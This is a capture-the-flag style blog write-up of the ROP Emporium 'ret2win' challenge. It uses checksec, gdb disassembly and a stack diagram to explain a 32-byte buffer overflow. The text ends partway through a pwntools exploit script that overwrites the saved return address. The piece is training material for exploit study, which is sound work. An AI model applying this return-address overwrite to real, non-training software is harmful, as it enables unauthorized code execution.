<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Ropemporium Ret2win challenge" /><meta property="og:locale" content="en" /><meta name="description" content="Locate a method that you want to call within the binary. Call it by overwriting a saved return address on the stack.This challenge is classical pwn challenge of overwriting the return address with desired address you want to return to." /><meta property="og:description" content="Locate a method that you want to call within the binary. Call it by overwriting a saved return address on the stack.This challenge is classical pwn challenge of overwriting the return address with desired address you want to return to." /><link rel="canonical" href="https://thuri10.github.io/thuri10.github.io/posts/ropemporium-ret2win/" /><meta property="og:url" content="https://thuri10.github.io/thuri10.github.io/posts/ropemporium-ret2win/" /><meta property="og:site_name" content="LaByte" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-12-20T21:07:00+03:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Ropemporium Ret2win challenge" /><meta name="twitter:site" content="@thuri0" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2021-12-20T21:07:00+03:00","datePublished":"2021-12-20T21:07:00+03:00","description":"Locate a method that you want to call within the binary. Call it by overwriting a saved return address on the stack.This challenge is classical pwn challenge of overwriting the return address with desired address you want to return to.","headline":"Ropemporium Ret2win challenge","mainEntityOfPage":{"@type":"WebPage","@id":"https://thuri10.github.io/thuri10.github.io/posts/ropemporium-ret2win/"},"url":"https://thuri10.github.io/thuri10.github.io/posts/ropemporium-ret2win/"}</script><title>Ropemporium Ret2win challenge | LaByte</title><link rel="apple-touch-icon" sizes="180x180" href="/thuri10.github.io/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/thuri10.github.io/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/thuri10.github.io/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/thuri10.github.io/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/thuri10.github.io/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="LaByte"><meta name="application-name" content="LaByte"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/thuri10.github.io/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/thuri10.github.io/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/thuri10.github.io/" class="mx-auto"> <img src="/thuri10.github.io/assets/images/profile.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/thuri10.github.io/">LaByte</a></div><div class="site-subtitle font-italic">Reversing Engineering and Application Security</div></div><ul class="w-100"><li class="nav-item"> <a href="/thuri10.github.io/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/thuri10.github.io/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/thuri10.github.io/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/thuri10.github.io/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/thuri10.github.io/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/thuri10" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/thuri0" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['thuri783','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/thuri10.github.io/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/thuri10.github.io/"> Home </a> </span> <span>Ropemporium Ret2win challenge</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>Ropemporium Ret2win challenge</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1640023620" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Dec 20, 2021 </em> </span><div class="d-flex justify-content-between"> <span> By <em> <a href="https://twitter.com/username">thuri</a> </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="831 words"> <em>4 min</em> read</span></div></div></div><div class="post-content"><blockquote><p>Locate a method that you want to call within the binary. Call it by overwriting a saved return address on the stack.This challenge is classical pwn challenge of overwriting the return address with desired address you want to return to.</p></blockquote><p>The binaries for the challenges can be downloaded from the author`s website <a href="https://ropemporium.com">ropemporium</a>.The goal of first challenge is to call the <strong>ret2win</strong> function.</p><p>After downloading the binary, the first is to check binary protection enabled on the binary using <code class="language-plaintext highlighter-rouge">checksec</code> utility.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>vx@archie:ret2win<span class="nv">$ </span>checksec <span class="nt">--file</span> ret2win
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE <span class="o">(</span>0x400000<span class="o">)</span>
</pre></table></code></div></div><p>Only <strong>NX</strong> (Not executable) is enabled on the binary meaning we cannot execute code stored on the stack like <code class="language-plaintext highlighter-rouge">shellcode</code>. Toe analyze the behavior of the program we will use <code class="language-plaintext highlighter-rouge">gdb</code>. gdb is a tool that enables one to inspect the behavior of binaries at runtime.</p><div class="language-nasm highlighter-rouge"><div class="code-header"> <span data-label-text="Nasm"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nv">info</span> <span class="nv">functions</span>
<span class="nf">All</span> <span class="nv">defined</span> <span class="nv">functions</span><span class="p">:</span>

<span class="nf">Non</span><span class="o">-</span><span class="nv">debugging</span> <span class="nv">symbols</span><span class="p">:</span>
<span class="err">0</span><span class="nf">x0000000000400528</span>  <span class="nv">_init</span>
<span class="err">0</span><span class="nf">x0000000000400550</span>  <span class="nv">puts@plt</span>
<span class="err">0</span><span class="nf">x0000000000400560</span>  <span class="nv">system@plt</span>
<span class="err">0</span><span class="nf">x0000000000400570</span>  <span class="nv">printf@plt</span>
<span class="err">0</span><span class="nf">x0000000000400580</span>  <span class="nv">memset@plt</span>
<span class="err">0</span><span class="nf">x0000000000400590</span>  <span class="nv">read@plt</span>
<span class="err">0</span><span class="nf">x00000000004005a0</span>  <span class="nv">setvbuf@plt</span>
<span class="err">0</span><span class="nf">x00000000004005b0</span>  <span class="nv">_start</span>
<span class="err">0</span><span class="nf">x00000000004005e0</span>  <span class="nv">_dl_relocate_static_pie</span>
<span class="err">0</span><span class="nf">x00000000004005f0</span>  <span class="nv">deregister_tm_clones</span>
<span class="err">0</span><span class="nf">x0000000000400620</span>  <span class="nv">register_tm_clones</span>
<span class="err">0</span><span class="nf">x0000000000400660</span>  <span class="nv">__do_global_dtors_aux</span>
<span class="err">0</span><span class="nf">x0000000000400690</span>  <span class="nv">frame_dummy</span>
<span class="err">0</span><span class="nf">x0000000000400697</span>  <span class="nv">main</span>
<span class="err">0</span><span class="nf">x00000000004006e8</span>  <span class="nv">pwnme</span>
<span class="err">0</span><span class="nf">x0000000000400756</span>  <span class="nv">ret2win</span>
<span class="err">0</span><span class="nf">x0000000000400780</span>  <span class="nv">__libc_csu_init</span>
<span class="err">0</span><span class="nf">x00000000004007f0</span>  <span class="nv">__libc_csu_fini</span>
<span class="err">0</span><span class="nf">x00000000004007f4</span>  <span class="nv">_fini</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span>
</pre></table></code></div></div><p>The binary has various functions has as shown in the output above.For initial analysis we start at the <code class="language-plaintext highlighter-rouge">main</code> function which is the entrypoint of our program.</p><div class="language-nasm highlighter-rouge"><div class="code-header"> <span data-label-text="Nasm"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre><td class="rouge-code"><pre><span class="err">(</span><span class="nf">No</span> <span class="nv">debugging</span> <span class="nv">symbols</span> <span class="nv">found</span> <span class="nv">in</span> <span class="nv">ret2win</span><span class="p">)</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nb">di</span><span class="nv">sas</span> <span class="nv">main</span>
<span class="nf">Dump</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">code</span> <span class="nv">for</span> <span class="nv">function</span> <span class="nv">main</span><span class="p">:</span>
   <span class="err">0</span><span class="nf">x0000000000400697</span> <span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">push</span>   <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x0000000000400698</span> <span class="o">&lt;+</span><span class="mi">1</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nb">rsp</span>
   <span class="err">0</span><span class="nf">x000000000040069b</span> <span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rax</span><span class="p">,</span><span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x2009b6</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0x601058</span> <span class="o">&lt;</span><span class="nv">stdout@@GLIBC_2.2.5</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000004006a2</span> <span class="o">&lt;+</span><span class="mi">11</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x00000000004006a7</span> <span class="o">&lt;+</span><span class="mi">16</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
   <span class="err">0</span><span class="nf">x00000000004006ac</span> <span class="o">&lt;+</span><span class="mi">21</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">esi</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x00000000004006b1</span> <span class="o">&lt;+</span><span class="mi">26</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rdi</span><span class="p">,</span><span class="nb">rax</span>
   <span class="err">0</span><span class="nf">x00000000004006b4</span> <span class="o">&lt;+</span><span class="mi">29</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x4005a0</span> <span class="o">&lt;</span><span class="nv">setvbuf@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000004006b9</span> <span class="o">&lt;+</span><span class="mi">34</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x400808</span>
   <span class="err">0</span><span class="nf">x00000000004006be</span> <span class="o">&lt;+</span><span class="mi">39</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400550</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000004006c3</span> <span class="o">&lt;+</span><span class="mi">44</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x400820</span>
   <span class="err">0</span><span class="nf">x00000000004006c8</span> <span class="o">&lt;+</span><span class="mi">49</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400550</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000004006cd</span> <span class="o">&lt;+</span><span class="mi">54</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">eax</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x00000000004006d2</span> <span class="o">&lt;+</span><span class="mi">59</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x4006e8</span> <span class="o">&lt;</span><span class="nv">pwnme</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000004006d7</span> <span class="o">&lt;+</span><span class="mi">64</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x400828</span>
   <span class="err">0</span><span class="nf">x00000000004006dc</span> <span class="o">&lt;+</span><span class="mi">69</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400550</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000004006e1</span> <span class="o">&lt;+</span><span class="mi">74</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">eax</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x00000000004006e6</span> <span class="o">&lt;+</span><span class="mi">79</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x00000000004006e7</span> <span class="o">&lt;+</span><span class="mi">80</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">ret</span>
<span class="nf">End</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">dump.</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span>
</pre></table></code></div></div><p>From the initial analysis of the main function,main call an interesting function called <strong>pwnme</strong>. Next is to disassemble <strong>pwnme</strong> function to understand the behavior.</p><div class="language-nasm highlighter-rouge"><div class="code-header"> <span data-label-text="Nasm"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nb">di</span><span class="nv">sas</span> <span class="nv">pwnme</span>
<span class="nf">Dump</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">code</span> <span class="nv">for</span> <span class="nv">function</span> <span class="nv">pwnme</span><span class="p">:</span>
   <span class="err">0</span><span class="nf">x00000000004006e8</span> <span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">push</span>   <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x00000000004006e9</span> <span class="o">&lt;+</span><span class="mi">1</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nb">rsp</span>
   <span class="err">0</span><span class="nf">x00000000004006ec</span> <span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">sub</span>    <span class="nb">rsp</span><span class="p">,</span><span class="mh">0x20</span>
   <span class="err">0</span><span class="nf">x00000000004006f0</span> <span class="o">&lt;+</span><span class="mi">8</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rax</span><span class="p">,[</span><span class="nb">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
   <span class="err">0</span><span class="nf">x00000000004006f4</span> <span class="o">&lt;+</span><span class="mi">12</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x20</span>
   <span class="err">0</span><span class="nf">x00000000004006f9</span> <span class="o">&lt;+</span><span class="mi">17</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">esi</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x00000000004006fe</span> <span class="o">&lt;+</span><span class="mi">22</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rdi</span><span class="p">,</span><span class="nb">rax</span>
   <span class="err">0</span><span class="nf">x0000000000400701</span> <span class="o">&lt;+</span><span class="mi">25</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400580</span> <span class="o">&lt;</span><span class="nv">memset@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400706</span> <span class="o">&lt;+</span><span class="mi">30</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x400838</span>
   <span class="err">0</span><span class="nf">x000000000040070b</span> <span class="o">&lt;+</span><span class="mi">35</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400550</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400710</span> <span class="o">&lt;+</span><span class="mi">40</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x400898</span>
   <span class="err">0</span><span class="nf">x0000000000400715</span> <span class="o">&lt;+</span><span class="mi">45</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400550</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x000000000040071a</span> <span class="o">&lt;+</span><span class="mi">50</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x4008b8</span>
   <span class="err">0</span><span class="nf">x000000000040071f</span> <span class="o">&lt;+</span><span class="mi">55</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400550</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400724</span> <span class="o">&lt;+</span><span class="mi">60</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x400918</span>
   <span class="err">0</span><span class="nf">x0000000000400729</span> <span class="o">&lt;+</span><span class="mi">65</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">eax</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x000000000040072e</span> <span class="o">&lt;+</span><span class="mi">70</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400570</span> <span class="o">&lt;</span><span class="nv">printf@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400733</span> <span class="o">&lt;+</span><span class="mi">75</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rax</span><span class="p">,[</span><span class="nb">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
   <span class="err">0</span><span class="nf">x0000000000400737</span> <span class="o">&lt;+</span><span class="mi">79</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x38</span>
   <span class="err">0</span><span class="nf">x000000000040073c</span> <span class="o">&lt;+</span><span class="mi">84</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rsi</span><span class="p">,</span><span class="nb">rax</span>
   <span class="err">0</span><span class="nf">x000000000040073f</span> <span class="o">&lt;+</span><span class="mi">87</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x0000000000400744</span> <span class="o">&lt;+</span><span class="mi">92</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400590</span> <span class="o">&lt;</span><span class="nv">read@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400749</span> <span class="o">&lt;+</span><span class="mi">97</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x40091b</span>
   <span class="err">0</span><span class="nf">x000000000040074e</span> <span class="o">&lt;+</span><span class="mi">102</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400550</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400753</span> <span class="o">&lt;+</span><span class="mi">107</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">nop</span>
   <span class="err">0</span><span class="nf">x0000000000400754</span> <span class="o">&lt;+</span><span class="mi">108</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">leave</span>
   <span class="err">0</span><span class="nf">x0000000000400755</span> <span class="o">&lt;+</span><span class="mi">109</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">ret</span>
<span class="nf">End</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">dump.</span>
</pre></table></code></div></div><p>From analysis of the above assembly code, we fill a buffer of size 0x20(32bytes) with a constant byte of zero. <strong>memset</strong> is used to overwrite any values present memory area specified. The memory we are overwriting is [rbp-0x20]. This means we are allocating a memory buffer of size 32 bytes from the address of base pointer as shown in the stack diagram below.</p><p><img data-src="/thuri10.github.io/assets/images/ropemporium/stack.png" alt="" data-proofer-ignore></p><p>Next function is <strong>read</strong> function, which reads from the standard input file descriptor and stores in the specified buffer.From the disassembled code we are reading 0x38 bytes from the user input and storing it in our buffer.</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">*</span><span class="p">[</span><span class="n">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">],</span> <span class="mh">0x38</span><span class="p">)</span> <span class="c1">//0 is file descriptor stdin</span>
</pre></table></code></div></div><p>Because we are reading more than what the buffer can hold, we corrupt the adjacent memory regions therefore causing a stack buffer overflow. Therefore in order to control the return address as shown in the stack image above is to fill the buffer, overwrite the <code class="language-plaintext highlighter-rouge">rbp</code> register and control the return address with <strong>ret2win</strong> function address.</p><p>The exploit code for this ret2win function is,</p><div class="language-python highlighter-rouge"><div class="code-header"> <span data-label-text="Python"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">pwn</span>

<span class="n">pwn</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">encoding</span> <span class="o">=</span> <span class="s">"latin-1"</span>
<span class="n">pwn</span><span class="p">.</span><span class="n">warnings</span><span class="p">.</span><span class="n">simplefilter</span><span class="p">(</span><span class="s">"ignore"</span><span class="p">)</span>
<span class="n">pwn</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s">"amd64"</span>

<span class="n">io</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="s">'./ret2win'</span><span class="p">)</span>

<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">32</span> <span class="c1"># fill the buffer
</span><span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"B"</span> <span class="o">*</span> <span class="mi">8</span>  <span class="c1">#overwrite saved base pointer
</span><span class="n">payload</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x400756</span><span class="p">)</span>  <span class="c1">#Address of ret2win function
